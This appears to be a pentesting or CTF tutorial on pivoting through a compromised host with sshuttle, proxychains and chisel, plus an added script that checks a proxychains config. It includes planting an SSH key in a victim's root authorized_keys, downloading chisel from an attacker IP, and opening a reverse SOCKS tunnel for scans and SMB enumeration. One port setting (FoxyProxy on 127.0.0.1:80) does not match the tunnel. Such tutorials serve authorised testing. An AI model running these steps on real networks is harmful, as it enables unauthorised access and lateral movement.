In this tutorial you will learn how to set up sshuttle and proxychains to pivot through a network.
SSHUTTLE
What is sshuttle
sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh, as long as that server has a sufficiently new Python installation. sshuttle needs root access on the local machine, but a normal account on the server is enough.
How to make it work
- Install sshuttle with this command:
sudo apt install sshuttle
- On your local machine, generate an ssh key with this command:
ssh-keygen -t rsa
- On the victim machine, put your public ssh key in the authorized_keys file with this command:
echo "YOUR_PUBLIC_SSH_KEY" >> /root/.ssh/authorized_keys
- On your local machine, connect to the victim machine with sshuttle:
sshuttle -vr root@VICTIM_MACHINE_IP SUBNET/24 --ssh-cmd "ssh -i ./PATH_TO_YOUR_PRIVATE_KEY"
Proxychains
What is Proxychains
ProxyChains is a tool that redirects TCP connections made by applications through various proxies like SOCKS4, SOCKS5, or HTTP. It is an open-source project for GNU/Linux systems. ProxyChains can string multiple proxies together to make it harder to identify the original IP address. You will need proxychains to use nmap, since nmap does not work with sshuttle.
- In the /etc/proxychains4.conf file, choose the port you want proxychains to use. It must be the same port you give to ssh -D in the next step.
- Run this ssh command to open the local SOCKS proxy that proxychains will use:
ssh -i PRIVATE_SSH_KEY -D localhost:9000 -f -N root@VICTIM_IP -p SSH_PORT
- You can now use proxychains with whatever tools you want. Here is an example of how to use it with nmap:
proxychains4 nmap IP_TO_SCAN
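An added example, not part of the original tutorial: the stock /etc/proxychains4.conf ends with a "socks4 127.0.0.1 9050" entry, so proxychains only reaches the listener opened by ssh -D localhost:9000 once the [ProxyList] entry points at port 9000. The script below checks a config file for that match; the function names and the two sample configs are constructed for illustration.

```shell
#!/bin/sh
# Added example: verify that a proxychains config has a SOCKS entry on the
# local port opened by `ssh -D`. Function names are hypothetical.

# Print "type host port" for every active entry under [ProxyList].
proxylist_entries() {
    awk '
        /^[ \t]*#/  { next }   # skip comment lines
        /^[ \t]*\[/ { in_list = ($0 ~ /^[ \t]*\[ProxyList\]/); next }
        in_list && NF >= 3 { print $1, $2, $3 }
    ' "$1"
}

# Return 0 if the config has a socks4/socks5 entry on 127.0.0.1:<port>.
has_socks_entry() {
    conf=$1
    port=$2
    proxylist_entries "$conf" | awk -v p="$port" '
        ($1 == "socks4" || $1 == "socks5") && $2 == "127.0.0.1" && $3 == p { found = 1 }
        END { exit !found }
    '
}

# Constructed sample configs (not taken from any real host).
demo_dir=$(mktemp -d)
printf '%s\n' 'strict_chain' '[ProxyList]' '# defaults set to "tor"' \
    'socks4 127.0.0.1 9050' > "$demo_dir/default.conf"
printf '%s\n' 'strict_chain' '[ProxyList]' \
    'socks5 127.0.0.1 9000' > "$demo_dir/fixed.conf"

# Port 9000 is the one used in the ssh -D command of this tutorial.
for name in default fixed; do
    if has_socks_entry "$demo_dir/$name.conf" 9000; then
        echo "$name.conf: SOCKS entry matches ssh -D localhost:9000"
    else
        echo "$name.conf: no SOCKS entry on 127.0.0.1:9000"
    fi
done
```

To check the real file, call has_socks_entry /etc/proxychains4.conf 9000 and look at its exit status.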
Chisel
cmd> curl http://10.10.14.8/chisel_1.7.6_windows_amd64 -o chisel.exe
cmd> .\chisel.exe client 10.10.14.8:8080 R:1080:socks
On Kali:
chisel server -p 8080 --reverse
In the browser, set FoxyProxy to 127.0.0.1:80
Example with SMB:
sudo proxychains smbmap -H <IP> -d '<DOMAIN>' -u '<USERNAME>' -p '<PASSWORD>'